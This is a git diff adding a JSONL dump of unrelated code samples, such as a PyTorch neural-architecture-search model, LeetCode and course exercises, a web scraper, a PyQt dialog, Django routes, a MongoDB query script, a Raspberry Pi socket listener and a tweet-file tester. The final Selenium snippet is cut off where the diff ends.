diff --git "a/2741.jsonl" "b/2741.jsonl" new file mode 100644--- /dev/null +++ "b/2741.jsonl" @@ -0,0 +1,678 @@ +{"seq_id":"570805812","text":"import torch\nimport torch.nn as nn\n\ntry:\n import apex\nexcept:\n print('apex is not installed')\nfrom openselfsup.models import builder\nfrom openselfsup.models.registry import MODELS\n\n\n@MODELS.register_module\nclass SiameseSupernetsMBConv(nn.Module):\n \"\"\"Siamese Supernets for MBConv search space.\n\n BossNAS (https://arxiv.org/abs/2103.12424).\n\n Args:\n backbone (dict): Config dict for module of backbone ConvNet.\n neck (dict): Config dict for module of deep features to compact feature vectors.\n Default: None.\n head (dict): Config dict for module of loss functions. Default: None.\n pretrained (str, optional): Path to pre-trained weights. Default: None.\n base_momentum (float): The base momentum coefficient for the target network.\n Default: 0.996.\n \"\"\"\n\n def __init__(self,\n backbone,\n start_block,\n num_block,\n neck=None,\n head=None,\n pretrained=None,\n base_momentum=0.996,\n use_fp16=False,\n update_interval=None,\n **kwargs):\n super(SiameseSupernetsMBConv, self).__init__()\n\n self.start_block = start_block\n self.num_block = num_block\n\n self.online_backbone = builder.build_backbone(backbone)\n self.target_backbone = builder.build_backbone(backbone)\n self.backbone = self.online_backbone\n self.online_necks = nn.ModuleList()\n self.target_necks = nn.ModuleList()\n self.heads = nn.ModuleList()\n neck_in_channel_list = [cfg[0] for cfg in self.online_backbone.block_cfgs]\n for in_channel in neck_in_channel_list:\n neck['in_channels'] = in_channel\n self.online_necks.append(builder.build_neck(neck))\n self.target_necks.append(builder.build_neck(neck))\n self.heads.append(builder.build_head(head))\n\n for param in self.target_backbone.parameters():\n param.requires_grad = False\n for target_neck in self.target_necks:\n for param in target_neck.parameters():\n param.requires_grad = False\n\n self.init_weights(pretrained=pretrained)\n self.set_current_neck_and_head()\n\n self.base_momentum = base_momentum\n self.momentum = base_momentum\n self.forward_op_online = None\n self.forward_op_target = None\n self.best_paths = []\n self.optimizer = None\n self.use_fp16 = use_fp16\n self.update_interval = update_interval\n\n def init_weights(self, pretrained=None):\n \"\"\"Initialize the weights of model.\n\n Args:\n pretrained (str, optional): Path to pre-trained weights.\n Default: None.\n \"\"\"\n self.online_backbone.init_weights() # backbone\n for online_neck in self.online_necks:\n online_neck.init_weights(init_linear='kaiming') # projection\n\n for param_ol, param_tgt in zip(self.online_backbone.parameters(),\n self.target_backbone.parameters()):\n param_tgt.data.copy_(param_ol.data)\n for param_ol, param_tgt in zip(self.online_necks.parameters(),\n self.target_necks.parameters()):\n param_tgt.data.copy_(param_ol.data)\n # init the predictor in the head\n for head in self.heads:\n head.init_weights()\n\n def set_current_neck_and_head(self):\n self.online_neck = self.online_necks[self.start_block]\n self.target_neck = self.target_necks[self.start_block]\n self.head = self.heads[self.start_block]\n self.online_net = nn.Sequential(self.online_backbone, self.online_neck)\n self.target_net = nn.Sequential(self.target_backbone, self.target_neck)\n\n @torch.no_grad()\n def _momentum_update(self):\n \"\"\"Momentum update of the target network.\"\"\"\n for param_ol, param_tgt in zip(self.online_net.parameters(),\n 
self.target_net.parameters()):\n param_tgt.data = param_tgt.data * self.momentum + \\\n param_ol.data * (1. - self.momentum)\n\n @torch.no_grad()\n def momentum_update(self):\n self._momentum_update()\n\n @torch.no_grad()\n def _batch_shuffle_ddp(self, x):\n \"\"\"Batch shuffle, for making use of BatchNorm.\n\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n\n num_gpus = batch_size_all // batch_size_this\n\n # random shuffle index\n idx_shuffle = torch.randperm(batch_size_all).cuda()\n\n # broadcast to all gpus\n torch.distributed.broadcast(idx_shuffle, src=0)\n\n # index for restoring\n idx_unshuffle = torch.argsort(idx_shuffle)\n\n # shuffled index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this], idx_unshuffle\n\n @torch.no_grad()\n def _batch_unshuffle_ddp(self, x, idx_unshuffle):\n \"\"\"Undo batch shuffle.\n\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n\n num_gpus = batch_size_all // batch_size_this\n\n # restored index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this]\n\n def forward_train(self, img, forward_singleop_online, idx=0, **kwargs):\n \"\"\"Forward computation during training.\n\n Args:\n img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).\n Typically these should be mean centered and std scaled.\n\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n assert img.dim() == 5, \\\n \"Input must have 5 dims, got: {}\".format(img.dim())\n\n v2_idx = img.shape[1] // 2\n img_v1 = img[:, idx, ...].contiguous()\n img_v2 = img[:, v2_idx + idx, ...].contiguous()\n if self.start_block > 0:\n for i, best_path in enumerate(self.best_paths):\n img_v1 = self.online_backbone(img_v1,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n img_v2 = self.online_backbone(img_v2,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n\n proj_online_v1 = self.online_neck(self.online_backbone(img_v1,\n start_block=self.start_block,\n forward_op=forward_singleop_online))[0]\n proj_online_v2 = self.online_neck(self.online_backbone(img_v2,\n start_block=self.start_block,\n forward_op=forward_singleop_online))[0]\n\n loss = self.head(proj_online_v1, self.proj_target_v2)['loss'] + \\\n self.head(proj_online_v2, self.proj_target_v1)['loss']\n\n return loss\n\n def forward_test(self, img, **kwargs):\n pass\n\n def forward(self, img, mode='train', **kwargs):\n if mode == 'train':\n return self.forward_train(img, **kwargs)\n elif mode == 'test':\n return self.forward_test(img, **kwargs)\n elif mode == 'extract':\n return self.backbone(img)\n elif mode == 'target':\n return self.forward_target(img, **kwargs)\n elif mode == 'single':\n return self.forward_single(img, **kwargs)\n else:\n raise Exception(\"No such mode: {}\".format(mode))\n\n @torch.no_grad()\n def forward_target(self, img, **kwargs):\n \"\"\"Forward computation during training.\n\n Args:\n img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).\n Typically these should be mean centered and std scaled.\n\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n assert img.dim() == 5, 
\\\n \"Input must have 5 dims, got: {}\".format(img.dim())\n\n img_v_l = []\n idx_unshuffle_v_l = []\n for idx in range(img.shape[1]):\n img_vi = img[:, idx, ...].contiguous()\n img_vi, idx_unshuffle_vi = self._batch_shuffle_ddp(img_vi)\n img_v_l.append(img_vi)\n idx_unshuffle_v_l.append(idx_unshuffle_vi)\n\n if self.start_block > 0:\n for idx in range(img.shape[1]):\n for i, best_path in enumerate(self.best_paths):\n img_v_l[idx] = self.target_backbone(img_v_l[idx],\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n\n self.forward_op_target = self.forward_op_online\n proj_target_v1 = 0\n proj_target_v2 = 0\n v2_idx = img.shape[1]//2\n with torch.no_grad():\n for op_idx, forward_singleop_target in enumerate(self.forward_op_target):\n temp_v1 = self.target_neck(self.target_backbone(img_v_l[op_idx],\n start_block=self.start_block,\n forward_op=forward_singleop_target))[\n 0].clone().detach()\n temp_v2 = self.target_neck(self.target_backbone(img_v_l[v2_idx + op_idx],\n start_block=self.start_block,\n forward_op=forward_singleop_target))[\n 0].clone().detach()\n temp_v1 = nn.functional.normalize(temp_v1, dim=1)\n temp_v1 = self._batch_unshuffle_ddp(temp_v1, idx_unshuffle_v_l[op_idx])\n\n temp_v2 = nn.functional.normalize(temp_v2, dim=1)\n temp_v2 = self._batch_unshuffle_ddp(temp_v2, idx_unshuffle_v_l[v2_idx + op_idx])\n\n proj_target_v1 += temp_v1\n proj_target_v2 += temp_v2\n\n self.proj_target_v1 = proj_target_v1 / (len(self.forward_op_target))\n self.proj_target_v2 = proj_target_v2 / (len(self.forward_op_target))\n\n def forward_single(self, img, forward_singleop, **kwargs):\n \"\"\"Forward computation during training.\n\n Args:\n img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).\n Typically these should be mean centered and std scaled.\n\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n img_v1 = img[:, 0, ...].contiguous()\n img_v2 = img[:, 1, ...].contiguous()\n\n if self.start_block > 0:\n for i, best_path in enumerate(self.best_paths):\n img_v1 = self.target_backbone(img_v1,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n img_v2 = self.target_backbone(img_v2,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n\n self.target_neck(self.target_backbone(img_v1,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n self.target_neck(self.target_backbone(img_v2,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n\n self.online_neck(self.online_backbone(img_v1,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n self.online_neck(self.online_backbone(img_v2,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n\n\n# utils\n@torch.no_grad()\ndef concat_all_gather(tensor):\n \"\"\"Performs all_gather operation on the provided tensors.\n\n *** Warning ***: torch.distributed.all_gather has no gradient.\n \"\"\"\n tensors_gather = [\n torch.ones_like(tensor)\n for _ in range(torch.distributed.get_world_size())\n ]\n torch.distributed.all_gather(tensors_gather, tensor, async_op=False)\n\n output = torch.cat(tensors_gather, dim=0)\n return output\n","sub_path":"searching/bossnas/models/siamese_supernets/siamese_supernets_mbconv.py","file_name":"siamese_supernets_mbconv.py","file_ext":"py","file_size_in_byte":13474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"228572417","text":"# -*- coding: utf-8 -*-\n# @Author : Jing\n# @FileName: 49. 
Group Anagrams.py\n# @IDE: PyCharm\n# https://leetcode.com/problems/group-anagrams/\n# Solution 1: classify by the sorted string.\n# Two strings belong to the same anagram group\n# exactly when they are equal after sorting.\n# O(NKlogK) time, O(NK) space\n# Solution 2: classify by character counts.\n# Two strings belong to the same anagram group exactly when\n# every character occurs the same number of times in both. O(NK) time, O(NK) space\n\n\nclass Solution:\n def groupAnagrams1(self, strs):\n if not strs:\n return strs\n dic = {}\n for s in strs:\n tmp_s = list(s)\n tmp_s = sorted(tmp_s)\n tmp_s = ''.join(tmp_s)\n if tmp_s not in dic:\n dic[tmp_s] = [s]\n else:\n dic[tmp_s].append(s)\n res = []\n for val in dic.values():\n res.append(val)\n return res\n\n def groupAnagrams2(self, strs):\n if not strs:\n return strs\n dic = {}\n for string in strs:\n count = [0 for _ in range(26)]\n for s in string:\n count[ord(s)-ord('a')] += 1\n count = tuple(count)\n if count not in dic:\n dic[count] = [string]\n else:\n dic[count].append(string)\n res = []\n for li in dic.values():\n res.append(li)\n return res\n\n\nif __name__ == '__main__':\n strings = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n s = Solution()\n print(s.groupAnagrams2(strings))\n\n\n\n\n","sub_path":"string/49. Group Anagrams.py","file_name":"49. Group Anagrams.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"415282397","text":"from urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\n\nreq = urlopen('https://www.10000recipe.com/recipe/6943674')\n\nprint(req.getcode())\n\nif req.getcode() == 200:\n html = req.read()\n #print(html)\n\n html = html.decode(\"utf-8\")\n #print(html)\nelse:\n print(\"HTTP ERROR\")\n\nsoup = BeautifulSoup(html, \"html.parser\")\n\nbody = soup.select(\"#stepDiv1 div\")\nbody1 = soup.select(\"#stepDiv2 div\")\nbody2 = soup.select(\"#stepDiv3 div\")\n\nprint(body ,body1 ,body2 , sep='\\n')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"377502103","text":"\"\"\"\n1-D convolution and cross-correlation operations\n\"\"\"\nimport numpy as np\n\n\ndef convolution_1d(x, w):\n \"\"\" x, w : 1d ndarray, len(x) >= len(w) \"\"\"\n w_r = np.flip(w)\n conv = []\n len_result = len(x) - len(w) + 1\n for i in range(len_result):\n x_sub = x[i:i+len(w)]\n fma = np.sum(x_sub * w_r)\n conv.append(fma)\n conv = np.array(conv)\n return conv\n\n\ndef cross_correlation_1d(x, w, convolution=False):\n \"\"\" x, w : 1d ndarray, len(x) >= len(w) \"\"\"\n if convolution:\n w = np.flip(w)\n\n conv = []\n len_result = len(x) - len(w) + 1\n for i in range(len_result):\n x_sub = x[i:i + len(w)]\n fma = np.sum(x_sub * w)\n conv.append(fma)\n conv = np.array(conv)\n return conv\n\n\nif __name__ == '__main__':\n np.random.seed(113)\n x = np.arange(1, 6)\n w = np.array([2, 1])\n w_r = np.flip(w)\n\n conv = []\n for i in range(4):\n x_sub = x[i:i+len(w)] # (0,1), (1,2), (2,3), (3,4)\n fma = np.sum(x_sub * w_r) # in the 1-D case, identical to np.dot(x_sub, w_r)\n conv.append(fma)\n conv = np.array(conv)\n print('conv =', conv)\n print('conv =', convolution_1d(x, w))\n\n x = np.arange(1, 6)\n w = np.array([2, 0, 1])\n print('conv =', convolution_1d(x, w))\n\n # Cross-correlation\n # differs from convolution in that w is not flipped;\n # CNNs (convolutional neural networks) mostly use cross-correlation\n\n cross_correlation = cross_correlation_1d(x, w)\n 
print('cross_correlation =', cross_correlation)","sub_path":"ch07/ex01_convolution1d.py","file_name":"ex01_convolution1d.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"502013084","text":"from random import choice\n\ndef testround(filt_count, filtered):\n test = []\n testindex = []\n filtered_update = []\n numberset = list(range(0, filt_count))\n if filt_count == 1:\n print(\"Not enough common basis to test, protocol will be aborted\")\n exit() \n else:\n for i in range(int(filt_count / 2)):\n rannum = choice(numberset)\n numberset.remove(rannum)\n testindex.append(rannum)\n test.append(filtered[rannum])\n for i in range(filt_count):\n if not i in testindex:\n filtered_update.append(filtered[i])\n else:\n continue\n return test, testindex, filtered_update\n\n\ndef testing(test_alice, test_bob, testindex, commonbasis, filtered, basis):\n counter = -1\n errors = 0\n errorh = 0\n for i in testindex:\n counter += 1\n if not test_alice[counter] == test_bob[counter]:\n if basis[commonbasis[i]] == 0:\n errors += 1\n elif basis[commonbasis[i]] == 1:\n errorh += 1\n return errors, errorh\n\n\ndef update_filtered(testindex, filtered):\n filtered_update = []\n for i in range(len(filtered)):\n if not i in testindex:\n filtered_update.append(filtered[i])\n else:\n continue\n return filtered_update\n\n\ndef errorconversion(e_s, e_h, test):\n e_t = round(((e_s + e_h) / len(test)) * 100, 2)\n e_s2 = 0;\n e_h2 = 0\n\n if not e_t == 0:\n e_s2 = (e_s / (e_s + e_h)) * 100\n e_h2 = (e_h / (e_s + e_h)) * 100\n return e_t, round(e_s2, 2), round(e_h2, 2)\n","sub_path":"qkd/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"323886108","text":"# -*- coding: utf-8 -*-\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom config.translations import Translations\nfrom config.icons_pics import Icons, Pics\nfrom config import config\n\n\nclass ui_dialog_about(object):\n def setupUi(self, DialogAbout):\n DialogAbout.setObjectName(\"DialogAbout\")\n DialogAbout.resize(400, 446)\n icons = Icons()\n DialogAbout.setWindowIcon(QtGui.QIcon(icons.actionAboutIcon))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n DialogAbout.sizePolicy().hasHeightForWidth())\n DialogAbout.setSizePolicy(sizePolicy)\n DialogAbout.setMinimumSize(QtCore.QSize(400, 446))\n DialogAbout.setMaximumSize(QtCore.QSize(400, 446))\n self.lblLogo = QtWidgets.QLabel(DialogAbout)\n self.lblLogo.setGeometry(QtCore.QRect(140, 70, 121, 20))\n self.lblLogo.setObjectName(\"lblLogo\")\n self.lblAppVersion = QtWidgets.QLabel(DialogAbout)\n self.lblAppVersion.setGeometry(QtCore.QRect(10, 160, 381, 41))\n font = QtGui.QFont()\n font.setPointSize(24)\n font.setBold(True)\n font.setWeight(75)\n self.lblAppVersion.setFont(font)\n self.lblAppVersion.setTextFormat(QtCore.Qt.RichText)\n self.lblAppVersion.setScaledContents(False)\n self.lblAppVersion.setAlignment(QtCore.Qt.AlignCenter)\n self.lblAppVersion.setObjectName(\"lblAppVersion\")\n self.lblAppDesc = QtWidgets.QLabel(DialogAbout)\n self.lblAppDesc.setGeometry(QtCore.QRect(10, 210, 381, 51))\n self.lblAppDesc.setAlignment(QtCore.Qt.AlignCenter)\n self.lblAppDesc.setWordWrap(True)\n self.lblAppDesc.setObjectName(\"lblAppDesc\")\n 
self.lblCopyright = QtWidgets.QLabel(DialogAbout)\n self.lblCopyright.setGeometry(QtCore.QRect(10, 270, 381, 51))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.lblCopyright.setFont(font)\n self.lblCopyright.setAlignment(\n QtCore.Qt.AlignHCenter\n | QtCore.Qt.AlignTop)\n self.lblCopyright.setWordWrap(True)\n self.lblCopyright.setObjectName(\"lblCopyright\")\n\n self.retranslate_ui(DialogAbout)\n QtCore.QMetaObject.connectSlotsByName(DialogAbout)\n\n def retranslate_ui(self, DialogAbout):\n lingo = Translations()\n pics = Pics()\n this_config = config.Config()\n _translate = QtCore.QCoreApplication.translate\n DialogAbout.setWindowTitle(_translate(\"DialogAbout\",\n lingo.load(\"DialogAbout\")\n + \" \"\n + this_config.APP_NAME, None))\n self.lblAppVersion.setText(_translate(\"DialogAbout\",\n this_config.APP_NAME\n + \" \"\n + this_config.APP_VERSION, None))\n self.lblAppDesc.setText(_translate(\"DialogAbout\",\n this_config.APP_NAME\n + \" \" + lingo.load(\"lblAppDesc\"),\n None))\n self.lblCopyright.setText(_translate(\"DialogAbout\",\n \"\"\n + \"
<html><head/><body><p align=\\\"center\\\">\"\n + lingo.load(\"lblCopyright\")\n + \"<br/>\"\n + this_config.APP_WEBSITE\n + \"</p></body></html>
\",\n None))\n\n self.lblLogo.resize(250, 250)\n mastodome_mascot = QtGui.QPixmap(\n pics.aboutMascoutImg).scaled(\n self.lblLogo.size())\n self.lblLogo.setPixmap(mastodome_mascot)\n self.lblLogo.move(75, 20)\n self.lblAppVersion.move(10, 280)\n self.lblAppDesc.move(10, 310)\n self.lblCopyright.move(10, 360)\n","sub_path":"gui/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381300163","text":"\"\"\"\nUrls\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^searching$', views.search, name='search'),\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^register_substitut$', views.register_substitut, name='register_substitut'),\n url(r'^account$', views.account, name='account'),\n url(r'^legal$', views.legal, name='legal'),\n url(r'^results', views.results, name='results'),\n url(r'^mysubstitutes', views.mysubstitutes, name='mysubstitutes'),\n url(r'^category-autocomplete/$',\n views.CategoryAutocomplete.as_view(), name='category-autocomplete', ),\n]\n","sub_path":"substitute/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"380880260","text":"import sys\nimport re\nimport pymongo\nimport json\nimport datetime\n\nclient = pymongo.MongoClient(host=\"da1.eecs.utk.edu\")\n\nDB = sys.argv[1]\nCOLL = sys.argv[2]\nfield = sys.argv[3]\n# allow multiple comma seperated targets simultaneoulsy, up to 2 maybe..\nTARGETS = sys.argv[4]\ntargets = map(lambda x: x.replace('.', '\\\\\\.'), TARGETS.split(','))\n\n\nif len(sys.argv) < 5:\n sys.exit('unexpected number of inputs')\nelif len(sys.argv) == 5:\n excludes = []\nelse:\n excludes = sys.argv[5:]\n\n\n# stdin assumes project + ';' + timestamp\ndef unixtime2timestamp(tmp):\n return datetime.datetime.fromtimestamp(int(tmp)).strftime('%Y-%m-%dT%H-%M-%S.500')\n\n\nprj2timestamp = {}\nfor line in sys.stdin:\n items = line.strip().split(';')\n prj = items[0]\n timestamp = unixtime2timestamp(items[1])\n prj2timestamp[prj] = timestamp\n\n\ndb = client[DB]\ncoll = db[COLL]\ncoll2 = db['Posts_title_' + TARGETS]\n#coll2 = db['Posts_titletidy_readr_tibble']\n# assume we only concern about questions, ignore answers\n\n# print(targets)\n#targets[0] = targets[0].replace('.', '\\.')\n\ntarget = '|'.join(targets)\nprint(target)\n\nfor prj in prj2timestamp:\n if len(excludes) != 0:\n results = coll.find({field: {'$regex': target, '$not': re.compile(excludes[0]), '$options': 'i'},\n 'PostTypeId': '1'}, {'_id': 0})\n else:\n results = coll.find({field: {'$regex': target, '$options': 'i'},\n 'PostTypeId': '1'}, {'_id': 0})\n\n for i in results:\n if int(i['Score']) > 0:\n # convert to int\n i['Score'] = int(i['Score'])\n i['CommentCount'] = int(i['CommentCount'])\n i['AnswerCount'] = int(i['AnswerCount'])\n i['ViewCount'] = int(i['ViewCount'])\n coll2.insert(i)\n\n # coll2.insert(i)\n","sub_path":"scripts/filterouttiydplusdatatable.py","file_name":"filterouttiydplusdatatable.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"231196001","text":"# Alexandros Gidarakos - https://www.linkedin.com/in/alexandrosgidarakos\n# My solution to MITx 6.00.1x Lecture 6 Problem 2\n\ndef oddTuples(aTup):\n '''\n aTup: a tuple\n\n returns: tuple, every other element of aTup.\n '''\n\n result 
= ()\n\n for i in range(0, len(aTup), 2):\n result += (aTup[i],)\n\n return result\n\nprint(oddTuples((1, 2, 3, 4, 5, 6, 7)))\n","sub_path":"lecture-6/lecture-6-problem-2.py","file_name":"lecture-6-problem-2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"340734300","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nfrom six import print_\nfrom six.moves import input\n\ntotal = 0\nfor present in sys.stdin:\n l, w, h = map(int, present.split(\"x\"))\n a = l * w\n b = w * h\n c = h * l\n smallest = min([a, b, c])\n total += 2 * a + 2 * b + 2 * c + smallest\nprint_(\"{} ft²\".format(total))\n","sub_path":"day2-1.py","file_name":"day2-1.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"455023035","text":"# -*- coding: utf-8 -*-\r\nimport socket\r\nimport threading\r\nimport access\r\nHOST = ''\r\nPORT = 50007\r\nrpiaddr = ''\r\nrpiconn = None\r\ntoken = b'thisisraspberrypi'\r\n\r\n\r\ndef rpi_listener():\r\n global rpiaddr,rpiconn\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((HOST, PORT))\r\n s.listen(1)\r\n while True:\r\n conn, addr = s.accept()\r\n print('Connected by', addr)\r\n access.intiative_send_msg('ov7o7t9E4Jbjl8CVaImoBl2oNDMI', 'Remote access', 'text')\r\n conn.settimeout(55)\r\n while True:\r\n try:\r\n data = conn.recv(1024)\r\n except Exception as e:\r\n print('there is a socket error::',e)\r\n conn.close()\r\n access.intiative_send_msg('ov7o7t9E4Jbjl8CVaImoBl2oNDMI', 'Raspberry Pi disconnected', 'text')\r\n break\r\n if data == token:\r\n print('data:', data)\r\n rpiaddr = addr[0]\r\n rpiconn = conn\r\n conn.send(b'thisisserver')\r\n else:\r\n print('attention error token:::',data)\r\n access.intiative_send_msg('ov7o7t9E4Jbjl8CVaImoBl2oNDMI', 'Received an unexpected access token: ' + str(data), 'text')\r\n if data == b'':\r\n break\r\n\r\n conn.close()\r\n\r\n\r\ndef start_listen():\r\n t = threading.Thread(target=rpi_listener)\r\n t.setDaemon(True)\r\n t.start()\r\n return","sub_path":"Server plugin/rpi_addr_listener.py","file_name":"rpi_addr_listener.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"578981259","text":"import FWCore.ParameterSet.Config as cms\n\n#\n# module for b-tag study\n#\n\n\nanalyzeBtags = cms.EDAnalyzer(\"BtagAnalyzer\",\n ## collections of RA4b objects\n jets = cms.InputTag(\"goodJets\"),\n bjets = cms.InputTag(\"mediumTrackHighEffBjets\"),\n muons = cms.InputTag(\"goodMuons\"),\n electrons = cms.InputTag(\"goodElectrons\"),\n met = cms.InputTag(\"patMETsPF\"),\n ## collections of matched objects\n matchedLightJets = cms.InputTag(\"matchedLightJets\"),\n matchedBjets = cms.InputTag(\"matchedBjets\"),\n ## for event and jet weighting\n PVSrc = cms.InputTag(\"offlinePrimaryVertices\"),\n PUInfo = cms.InputTag(\"addPileupInfo\"),\n PUWeight = cms.InputTag(\"eventWeightPU:eventWeightPU\"),\n RA2Weight = cms.InputTag(\"weightProducer:weight\"),\n BtagEventWeights = cms.InputTag(\"btagEventWeight:RA4bEventWeights\"),\n BtagJetWeights = cms.InputTag(\"btagEventWeight:RA4bJetWeights\"),\n BtagJetWeightsGrid = cms.InputTag(\"BtagEventWeight:RA4bJetWeightsGrid\"),\n BtagEventWeightsGrid = cms.InputTag(\"btagEventWeight:RA4bJetWeightsGrid\"),\n BtagEffGrid = cms.InputTag(\"btagEventWeight:effBTagEventGrid\"),\n ## ...\n ## bool \n useEventWeight = cms.bool(False),\n useBtagEventWeight = 
cms.bool(False),\n ## 0: 0 btags, 1: 1 btag; 2: 2 btags, 3: 3 or more btags \n btagBin = cms.int32(0)\n )\n","sub_path":"Btagging/BtagAnalyzer/python/BtagAnalyzer_cfi.py","file_name":"BtagAnalyzer_cfi.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"37655910","text":"#!/usr/bin/env python\n# coding=utf-8\nimport codecs\nimport datetime\nfrom glob import glob\nimport os\nimport re\n\nclass Tester:\n \"\"\"\n Test all the text files to ensure:\n * Tweets are all in order - within each file the most recent should\n be first.\n * All Tweets should be <= 280 characters in length.\n\n Outputs a report listing all errors.\n \"\"\"\n\n def __init__(self):\n\n self.project_root = os.path.abspath(os.path.dirname(__file__))\n\n # Will be a list of dicts:\n self.errors = []\n\n def start(self):\n\n # Cycle through every directory in /tweets/ whose name is four digits:\n for d in glob('{}/tweets/{}'.format(self.project_root, '[0-9]' * 4)):\n for f in os.listdir(d):\n # Test every .txt file:\n if f.endswith('.txt'):\n self.test_file(\n os.path.join(self.project_root, 'tweets', d, f))\n\n last_file = None\n\n # Output all errors, if any.\n if len(self.errors) == 0:\n print(\"\\nEverything is OK.\")\n else:\n for err in self.errors:\n # err has 'filepath', 'time' and 'text' elements.\n if last_file is None or last_file != err['filepath']:\n # eg 'FILE: 1660/01.txt'\n dir_file = '/'.join(err['filepath'].split('/')[-2:])\n print(\"\\nFILE tweets/{}\".format(dir_file))\n\n print(\" {}: {}\".format(err['time'], err['text']).encode('utf-8'))\n\n last_file = err['filepath']\n\n\n def test_file(self, filepath):\n \"Test an individual file.\"\n\n f = codecs.open(filepath, 'r', 'utf-8')\n\n prev_time = None\n\n for line in f:\n line = line.strip()\n if line != '':\n # Use same match as in tweeter.py, and only test matching lines.\n line_match = re.match(\n '^(\\d{4}-\\d{2}-\\d{2}\\s\\d{2}\\:\\d{2})\\s(.*?)$', line)\n\n if line_match:\n [tweet_time, tweet_text] = line_match.groups()\n\n t = datetime.datetime.strptime(tweet_time, '%Y-%m-%d %H:%M')\n\n if prev_time is not None:\n if t > prev_time:\n self.add_error(\n filepath,\n tweet_time,\n \"Time is after previous time ({}).\".format(prev_time))\n elif t == prev_time:\n self.add_error(\n filepath,\n tweet_time,\n \"Time is the same as previous time ({}).\".format(prev_time))\n if len(tweet_text) > 280:\n self.add_error(\n filepath,\n tweet_time,\n \"Tweet is {} characters long.\".format(len(tweet_text)))\n\n prev_time = t\n f.close()\n\n def add_error(self, filepath, dt, txt):\n self.errors.append({\n 'filepath': filepath,\n 'time': dt,\n 'text': txt\n })\n\n\ndef main():\n tester = Tester()\n\n tester.start()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"298139905","text":"from selenium import webdriver\nimport time\n\noptions = webdriver.ChromeOptions()\nprefs = {\n \"download.default_directory\": \"C:\\\\MyNewFolder\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True\n }\noptions.add_experimental_option('prefs', prefs)\ndriver = 
